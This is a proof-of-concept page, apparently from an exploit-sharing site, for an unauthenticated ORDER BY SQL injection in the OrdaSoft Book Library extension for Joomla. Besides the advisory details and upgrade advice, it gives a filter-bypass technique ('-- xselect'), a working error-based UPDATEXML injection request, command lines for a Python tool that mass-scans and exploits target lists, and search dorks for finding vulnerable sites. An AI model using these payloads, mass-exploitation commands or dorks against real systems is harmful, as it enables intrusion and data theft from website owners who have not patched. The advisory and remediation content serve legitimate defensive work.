CVE-2026-101110 — OrdaSoft Joomla Book Library (Free) Unauthenticated SQL Injection
September 29, 2026 · 29 views
OrdaSoft Book Library (Free) for Joomla ≤ 6.4.6: unauthenticated SQL injection (CWE-89) in books() via field/direction sort params — weak select substring blacklist + protectInjectionWithoutQuote, unquoted ORDER BY, session prime + `-- xselect` bypass (com_booklibrary). Fixed in 6.4.7+. CVSS 4.0 9.3 Critical. Python PoC: check, exploit, mass -j.
Description
Overview
CVE-2026-101110 affects OrdaSoft Book Library (Free) for Joomla — extension ≤ 6.4.6. Upgrade to 6.4.7+.
| | |
|---|---|
| Component | com_booklibrary |
| File / function | site/booklibrary.php → books() |
| Parameters | field, direction (sort) |
| Auth | None (public book listings) |
| CWE | CWE-89 SQL Injection |
| CVSS 4.0 | 9.3 Critical (Joomla CNA) |
| Credit | Ala Arfaoui |
Mechanism: books() runs field / direction through protectInjectionWithoutQuote(), which only substring-matches select and then wraps the value in $db->quote() — ineffective when the value is concatenated into an unquoted ORDER BY clause.
Exploitation requires:
- Session priming — first request sets default sort (
field/direction) in session. - Blacklist bypass — second request appends
-- xselectso the filter seesselectin the comment tail while the active expression before--remains executable SQL.
Request 1 (prime): ...&field=title&direction=ASC → session sort defaults
Request 2 (inject): ...&field=<expr> -- xselect&direction=ASC
└─ concatenated into ORDER BY (unquoted)
PoC page: https://pocbit.org/pocs/cve-2026-101110
GitHub: murrez/CVE-2026-101110
Bundled tool (Python 3)
Download poc.py from this page (View exploit code).
pip install -r requirements.txt
python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 12 --subquery "SELECT VERSION()" --exploited-list exploited.txt
| Step | PoC behavior |
|------|----------------|
| Fingerprint | com_booklibrary paths + optional manifest version |
| Routes | showCategory, search, showBooks, books, … + scraped catid / Itemid |
| check | Prime session → confirm SQLi (flag / VERSION()); --aggressive |
| exploit | Prime → error-based extract via --subquery (default SELECT VERSION()) |
| mass | --list + -j; exploited.txt on successful leak |
Payload decoy suffix in code: -- xselect (BLACKLIST_DECOY). JSONL includes session_primed.
Example HTTP
Prime (session):
GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=title&direction=ASC
Inject (PoC appends decoy):
GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=UPDATEXML(1,CONCAT(0x7e,(VERSION()),0x7e),1) -- xselect&direction=ASC
POST variants are attempted when GET fails.
Version detection
/administrator/components/com_booklibrary/booklibrary.xml
≤ 6.4.6 → vulnerable; ≥ 6.4.7 → patched.
Related OrdaSoft CVEs (Sep 2026)
| CVE | Extension | Issue | Fixed |
|-----|-----------|-------|-------|
| CVE-2026-101110 | Book Library | ORDER BY SQLi + blacklist bypass | 6.4.7 |
| CVE-2026-101111 | Book Library | Reflected XSS (title) | 6.4.7 |
| CVE-2026-101108 | Vehicle Manager | ORDER BY SQLi | 6.5.8 |
| CVE-2026-100752 | Real Estate Manager | ORDER BY SQLi | 6.7.9 |
Patch all OrdaSoft components you deploy.
Hunting (examples)
body="option=com_booklibrary"
body="/components/com_booklibrary/" && body="Joomla"
body="com_booklibrary" && (body="booklibrary" || body="Book Library")
body="ordasoft" && body="booklibrary"
Remediation
- Upgrade to Book Library 6.4.7+.
- Review other OrdaSoft Joomla extensions on the same site.
- Monitor
com_booklibrarysort parameters until patched.
Legal and ethical use
Authorized testing and patch validation only.
References
Related PoCs
Same platform, vendor, or tags — explore more write-ups on Pocbit.
- JoomlaCVE-2026-101108critical
CVE-2026-101108 — OrdaSoft Joomla Vehicle Manager (Free) Unauthenticated SQL Injection
OrdaSoft Vehicle Manager (Free) for Joomla ≤ 6.5.7: unauthenticated SQL injection (CWE-89) via order_field and order_direction concatenated into unquoted ORDER BY in site/vehiclemanager.php (com_vehiclemanager). Escaping is ineffective for sort keys. Public category, search, and all-vehicles views. Fixed in 6.5.8+. CVSS 4.0 9.3 Critical. Python PoC: check, error-based exploit, mass -j.
- JoomlaCVE-2026-100752high
CVE-2026-100752 — OrdaSoft Joomla Real Estate Manager (Free) Unauthenticated SQL Injection
OrdaSoft Real Estate Manager (Free) for Joomla ≤ 6.7.8: unauthenticated SQL injection (CWE-89) via order_field concatenated into ORDER BY in site/realestatemanager.php (com_realestatemanager). Public category, search, and listing views — no auth. Fixed in 6.7.9+. Python PoC: fingerprint, check, error-based exploit, mass -j; legacy order_direction POST fallback.
- JoomlaCVE-2026-88854critical
CVE-2026-88854 — OrdaSoft Joomla Gallery ≤ 6.2.6 Unauthenticated SQL Injection
Unauthenticated SQL injection in OrdaSoft **OS Gallery** (`com_osgallery` / `com_osgallery_light` ≤ 6.2.6) via the image **search** parameter (`textsearch`).
- JoomlaCVE-2026-94130critical
CVE-2026-94130 — Joomla YouTube Gallery Unauthenticated SQL Injection
Unauthenticated SQL injection (CWE-89, CVSS 4.0 9.3 Critical) in YouTube Gallery for Joomla (com_youtubegallery, joomlaboat.com) ≤ 5.7.2 — video search and sorting on the public yg_api=1 JSON API (ygsearchfields, ygsearchquery, sort params). Fixed in 5.7.3.